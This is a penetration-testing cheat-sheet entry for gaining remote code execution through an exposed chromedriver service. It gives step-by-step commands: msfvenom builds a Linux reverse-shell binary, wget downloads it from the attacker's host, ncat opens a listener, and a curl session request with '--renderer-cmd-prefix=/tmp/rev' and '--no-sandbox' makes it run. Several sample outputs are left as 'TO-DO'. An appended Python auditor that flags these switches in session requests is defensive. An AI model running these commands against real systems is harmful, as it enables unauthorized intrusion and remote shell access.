Privesc #1: RCE
1. Create a Payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f elf > rev
Sample Output:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.0.1 LPORT=1337 -f elf > rev
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
2. Upload to Target
wget http://<LOCAL_IP>/rev -O /tmp/rev
Sample Output:
TO-DO
# Chmod
chmod 755 /tmp/rev
Sample Output:
TO-DO
3. Start a Listener
rlwrap ncat -lvnp <LOCAL_PORT>
Sample Output:
TO-DO
4. Create a Session with Command
curl -d '{
"capabilities": {
"alwaysMatch": {
"browserName": "chrome",
"goog:chromeOptions": {
"args": ["--headless", "--no-sandbox", "--disable-dev-shm-usage", "--renderer-cmd-prefix=/tmp/rev"],
"prefs": {
}
}
}
}
}' http://<TARGET>:9515/session
Sample Output:
TO-DO
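Detection side of the session-creation request shown on this page, as an added example that is not part of the original cheat sheet: it audits the JSON body of a POST /session call to chromedriver and reports the two switches the request relies on. The function names, the finding strings and the list of writable directories are assumptions made for this illustration.

```python
import json

# Switches taken from the request shown on this page (leading dashes stripped).
EXEC_SWITCH = "renderer-cmd-prefix"
WEAKENING = {"no-sandbox"}
# Assumption: directories any local user can typically write to.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def _capability_sets(doc):
    """Yield every capability object in a W3C new-session body."""
    caps = doc.get("capabilities")
    if not isinstance(caps, dict):
        return
    first = caps.get("firstMatch")
    candidates = [caps.get("alwaysMatch")]
    candidates += first if isinstance(first, list) else []
    for entry in candidates:
        if isinstance(entry, dict):
            yield entry


def audit_new_session(body):
    """Return a list of findings for one POST /session request body."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        doc = None
    if not isinstance(doc, dict):
        return ["unparseable body"]
    findings = []
    for caps in _capability_sets(doc):
        opts = caps.get("goog:chromeOptions")
        args = opts.get("args") if isinstance(opts, dict) else None
        for arg in args if isinstance(args, list) else []:
            # Normalise so a switch written without dashes is still matched.
            name, _, value = str(arg).lstrip("-").partition("=")
            if name == EXEC_SWITCH:
                findings.append(f"exec-switch {name} -> {value}")
                if value.startswith(WRITABLE_DIRS):
                    findings.append(f"binary in writable dir: {value}")
            elif name in WEAKENING:
                findings.append(f"sandbox disabled: {name}")
    return findings


# Constructed sample: the same capabilities as the curl request on this page.
SAMPLE = json.dumps({"capabilities": {"alwaysMatch": {"browserName": "chrome",
    "goog:chromeOptions": {"args": ["--headless", "--no-sandbox",
        "--disable-dev-shm-usage", "--renderer-cmd-prefix=/tmp/rev"]}}}})
```

Run over request bodies captured by a proxy or logging layer in front of port 9515, any non-empty result from audit_new_session() marks a session request worth alerting on.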